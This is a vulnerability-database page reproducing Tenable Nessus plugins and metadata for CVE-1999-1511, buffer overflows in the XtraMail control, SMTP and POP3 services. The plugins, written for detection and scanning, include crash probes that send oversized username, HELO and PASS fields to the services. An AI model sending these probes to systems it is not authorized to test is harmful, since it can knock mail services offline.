Search...

XtraMail Control Service Username Overflow

1999-11-10T00:00:00

ID XTRAMAIL_CONTROL.NASL
Type nessus
Reporter This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
Modified 2021-01-02T00:00:00

Description

The remote host is running a version of XtraMail with a remote buffer overflow vulnerability. XtraMail includes a remote administration utility which listens on port 32000 for logins. Providing a username of over 15,000 characters causes a buffer overflow, which could allow a remote attacker to crash the service or potentially execute arbitrary code.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10323);
 script_version("1.36");
 script_cvs_date("Date: 2018/11/15 20:50:24");

 script_cve_id("CVE-1999-1511");
 script_bugtraq_id(791);

 script_name(english:"XtraMail Control Service Username Overflow");
 script_summary(english:"Attempts to crash the remote mail server");

 script_set_attribute(attribute:"synopsis", value:
"The remote host is running a mail server with a remote buffer overflow
vulnerability.");
 script_set_attribute(attribute:"description", value:
"The remote host is running a version of XtraMail with a remote buffer
overflow vulnerability. XtraMail includes a remote administration
utility which listens on port 32000 for logins. Providing a username
of over 15,000 characters causes a buffer overflow, which could allow
a remote attacker to crash the service or potentially execute
arbitrary code.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Nov/128");
 script_set_attribute(attribute:"solution", value:"Upgrade to the latest version of the software.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/11/10");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/11/10");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_family(english:"Misc.");
 script_category(ACT_MIXED_ATTACK); # mixed
 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");

 script_dependencie("find_service1.nasl", "sendmail_expn.nasl");
 script_require_ports(32000);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

port = 32000;

if(safe_checks())
{
 if(!get_port_state(port))exit(0);
 soc = open_sock_tcp(port);
 if(!soc)exit(0);
 banner = recv_line(socket:soc, length:4096);
 close(soc);
 if(banner)
 {
  b = tolower(banner);
  if("xtramail" &gt;&lt; b)
  {
  if( ereg(pattern:".*1\.([0-9]|1[0-1])[^0-9].*",
   	string:b)
    )
    {
     data = "
Nessus reports this vulnerability using only information that was
gathered. Use caution when testing without safe checks enabled.";
     security_hole(port:port, extra: data);
    }
  }
 }
 exit(0);
}

if (report_paranoia &lt; 2) audit(AUDIT_PARANOID);

if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  s = recv_line(socket:soc, length:1024);
  if ( ! s ) exit(0);
  c = string("Username: ", crap(15000), "\r\n");
  send(socket:soc, data:c);
  s = recv_line(socket:soc, length:1024);
  if(!s)security_hole(port);
  close(soc);
 }
}

JSON Vulners Source

Initial Source

{"id": "XTRAMAIL_CONTROL.NASL", "bulletinFamily": "scanner", "title": "XtraMail Control Service Username Overflow", "description": "The remote host is running a version of XtraMail with a remote buffer\noverflow vulnerability. XtraMail includes a remote administration\nutility which listens on port 32000 for logins. Providing a username\nof over 15,000 characters causes a buffer overflow, which could allow\na remote attacker to crash the service or potentially execute\narbitrary code.", "published": "1999-11-10T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/10323", "reporter": "This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.", "references": ["https://seclists.org/bugtraq/1999/Nov/128"], "cvelist": ["CVE-1999-1511"], "type": "nessus", "lastseen": "2021-01-01T07:01:17", "edition": 24, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-1511"]}, {"type": "osvdb", "idList": ["OSVDB:252", "OSVDB:251", "OSVDB:253"]}, {"type": "nessus", "idList": ["XTRAMAIL_HELO.NASL", "XTRAMAIL_POP_OVERFLOW.NASL"]}], "modified": "2021-01-01T07:01:17", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-01T07:01:17", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10323);\n script_version(\"1.36\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-1999-1511\");\n script_bugtraq_id(791);\n\n script_name(english:\"XtraMail Control Service Username Overflow\");\n script_summary(english:\"Attempts to crash the remote mail server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a mail server with a remote buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of XtraMail with a remote buffer\noverflow vulnerability. XtraMail includes a remote administration\nutility which listens on port 32000 for logins. Providing a username\nof over 15,000 characters causes a buffer overflow, which could allow\na remote attacker to crash the service or potentially execute\narbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/1999/Nov/128\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to the latest version of the software.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"1999/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"1999/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_family(english:\"Misc.\");\n script_category(ACT_MIXED_ATTACK); # mixed\n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"find_service1.nasl\", \"sendmail_expn.nasl\");\n script_require_ports(32000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\n\nport = 32000;\n\nif(safe_checks())\n{\n if(!get_port_state(port))exit(0);\n soc = open_sock_tcp(port);\n if(!soc)exit(0);\n banner = recv_line(socket:soc, length:4096);\n close(soc);\n if(banner)\n {\n b = tolower(banner);\n if(\"xtramail\" >< b)\n {\n if( ereg(pattern:\".*1\\.([0-9]|1[0-1])[^0-9].*\",\n \tstring:b)\n )\n {\n data = \"\nNessus reports this vulnerability using only information that was\ngathered. Use caution when testing without safe checks enabled.\";\n security_hole(port:port, extra: data);\n }\n }\n }\n exit(0);\n}\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif(get_port_state(port))\n{\n soc = open_sock_tcp(port);\n if(soc)\n {\n s = recv_line(socket:soc, length:1024);\n if ( ! s ) exit(0);\n c = string(\"Username: \", crap(15000), \"\\r\\n\");\n send(socket:soc, data:c);\n s = recv_line(socket:soc, length:1024);\n if(!s)security_hole(port);\n close(soc);\n }\n}\n", "naslFamily": "Misc.", "pluginID": "10323", "cpe": [], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:36:56", "description": "Buffer overflows in Xtramail 1.11 allow attackers to cause a denial of service (crash) and possibly execute arbitrary commands via (1) a long PASS command in the POP3 service, (2) a long HELO command in the SMTP service, or (3) a long user name in the Control Service.", "edition": 3, "cvss3": {}, "published": "1999-11-10T05:00:00", "title": "CVE-1999-1511", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-1511"], "modified": "2017-12-19T02:29:00", "cpe": ["cpe:/a:artisoft:xtramail:1.11"], "id": "CVE-1999-1511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1511", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:artisoft:xtramail:1.11:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-1511"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nSnort Signature ID: 1636\nSnort Signature ID: 1634\n[CVE-1999-1511](https://vulners.com/cve/CVE-1999-1511)\nBugtraq ID: 791\n", "modified": "1999-11-10T00:00:00", "published": "1999-11-10T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:251", "id": "OSVDB:251", "type": "osvdb", "title": "Artisoft XtraMail Control Service Username Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-1511"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[CVE-1999-1511](https://vulners.com/cve/CVE-1999-1511)\nBugtraq ID: 791\n", "modified": "1999-11-10T00:00:00", "published": "1999-11-10T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:252", "id": "OSVDB:252", "type": "osvdb", "title": "Artisoft XtraMail SMTP HELO Command Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-1511"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nSnort Signature ID: 1636\nSnort Signature ID: 1634\n[CVE-1999-1511](https://vulners.com/cve/CVE-1999-1511)\nBugtraq ID: 791\n", "modified": "1999-11-10T00:00:00", "published": "1999-11-10T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:253", "id": "OSVDB:253", "type": "osvdb", "title": "Artisoft XtraMail POP3 PASS Command Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T07:01:17", "description": "The remote host is running a version of XtraMail with a remote buffer\noverflow vulnerability. The overflow is caused by by issuing the\n'HELO' command, followed by a long argument.\n\nThe HELO command is typically one of the first commands required by a\nmail server. The command is used by the mail server as a first attempt\nto allow the client to identify itself. As such, this command occurs\nbefore there is any authentication or validation of mailboxes, etc.\n\nThis issue may allow an attacker to crash the mail server, or possibly\nexecute arbitrary code.", "edition": 25, "published": "1999-11-10T00:00:00", "title": "XtraMail SMTP HELO Command Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-1511"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "XTRAMAIL_HELO.NASL", "href": "https://www.tenable.com/plugins/nessus/10324", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added BugtraqID and CAN\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10324);\n script_version(\"1.42\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-1999-1511\");\n script_bugtraq_id(791);\n\n script_name(english:\"XtraMail SMTP HELO Command Remote Overflow\");\n script_summary(english:\"Attempts to overflow the HELO buffer\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a mail server with a remote buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of XtraMail with a remote buffer\noverflow vulnerability. The overflow is caused by by issuing the\n'HELO' command, followed by a long argument.\n\nThe HELO command is typically one of the first commands required by a\nmail server. The command is used by the mail server as a first attempt\nto allow the client to identify itself. As such, this command occurs\nbefore there is any authentication or validation of mailboxes, etc.\n\nThis issue may allow an attacker to crash the mail server, or possibly\nexecute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/1999/Nov/128\");\n script_set_attribute(attribute:\"solution\", value:\"Contact the vendor for a patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"1999/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"1999/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n\n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SMTP problems\");\n\n script_dependencie(\"smtpserver_detect.nasl\", \"sendmail_expn.nasl\", \"slmail_helo.nasl\", \"csm_helo.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nport = get_service(svc:\"smtp\", default: 25, exit_on_fail: 1);\nif (get_kb_item('SMTP/'+port+'/broken')) exit(0);\n\nif(safe_checks())\n{\n banner = get_smtp_banner(port:port);\n if(banner)\n {\n b = tolower(banner);\n if(\"xtramail\" >< b)\n {\n if( egrep(pattern:\".*1\\.([0-9]|1[0-1])[^0-9].*\",\n \tstring:b)\n )\n {\n data = \"\nNessus reports this vulnerability using only information that was\ngathered. Use caution when testing without safe checks enabled.\";\n security_hole(port:port, extra: data);\n }\n }\n }\n exit(0);\n}\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nkey = get_kb_item(string(\"SMTP/\", port, \"/helo_overflow\"));\nif (key) exit(0);\nsoc = open_sock_tcp(port);\nif (! soc) exit(1);\n\n s = smtp_recv_banner(socket:soc);\n if(!s)exit(0);\n if(!(\"220 \" >< s)){\n \tclose(soc);\n\texit(0);\n\t}\nc = 'HELO ' + crap(15000) + '\\r\\n';\n send(socket:soc, data:c);\n s = recv_line(socket:soc, length:1024);\n if(!s)\n {\n close(soc);\n soc = open_sock_tcp(port);\n if(soc) s = smtp_recv_banner(socket:soc);\n else s = NULL;\n if(!s)security_hole(port);\n }\n close(soc);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T07:01:17", "description": "The remote POP3 server is vulnerable to the following buffer overflow :\n\n USER test PASS <buffer>\n\nThis may allow an attacker to execute arbitrary commands as root on\nthe remote POP3 server.", "edition": 24, "published": "1999-11-10T00:00:00", "title": "XtraMail POP3 PASS Command Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-1511"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "XTRAMAIL_POP_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/10325", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10325);\n script_version(\"1.48\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-1999-1511\");\n script_bugtraq_id(791);\n\n script_name(english:\"XtraMail POP3 PASS Command Remote Overflow\");\n script_summary(english:\"Attempts to overflow the in.pop3d buffers\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a mail server with a remote buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote POP3 server is vulnerable to the following buffer overflow :\n\n USER test PASS <buffer>\n\nThis may allow an attacker to execute arbitrary commands as root on\nthe remote POP3 server.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/1999/Nov/128\");\n script_set_attribute(attribute:\"solution\", value:\"Contact the vendor for the latest update.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"1999/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"1999/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n\n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n\n script_dependencie(\"find_service1.nasl\", \"qpopper.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/pop3\", 110);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nport = get_service(svc:\"pop3\", default: 110, exit_on_fail: 1);\nfake = get_kb_item(\"pop3/\"+port+\"/false_pop3\");\nif(fake)exit(0);\n\nif(safe_checks())\n{\n banner = get_kb_item(string(\"pop3/banner/\", port));\n if(!banner){\n \t\tsoc = open_sock_tcp(port);\n if(!soc)exit(0);\n\t\tbanner = recv_line(socket:soc, length:4096);\n\t\tif ( ! banner ) exit(0);\n\t\tclose(soc);\n\t\tif (substr(banner,0,2) != '+OK') exit(0);\t# Not a POP3 server!\n\t }\n if(banner)\n {\n b = tolower(banner);\n if(\"xtramail\" >< b)\n {\n if( ereg(pattern:\".*1\\.([0-9]|1[0-1])[^0-9].*\",\n \tstring:b)\n )\n {\n data = \"\nreports this vulnerability using only information that was gathered.\nUse caution when testing without safe checks enabled.\";\n security_hole(port:port, extra:data);\n }\n }\n }\n exit(0);\n}\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif(get_port_state(port))\n{\n soc = open_sock_tcp(port);\n if(soc)\n {\n r = recv_line(socket:soc, length:4096);\n if(!r)exit(0);\n\n c = string(\"USER test\\r\\n\");\n send(socket:soc, data:c);\n d = recv_line(socket:soc, length:1024);\n c = string(\"PASS \", crap(2000), \"\\r\\n\");\n send(socket:soc, data:c);\n d = recv_line(socket:soc, length:1024, timeout:15);\n close(soc);\n\n soc = open_sock_tcp(port);\n if(soc)\n {\n r = recv_line(socket:soc, length:4096);\n if(!r)security_hole(port);\n }\n else\n security_hole(port);\n }\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}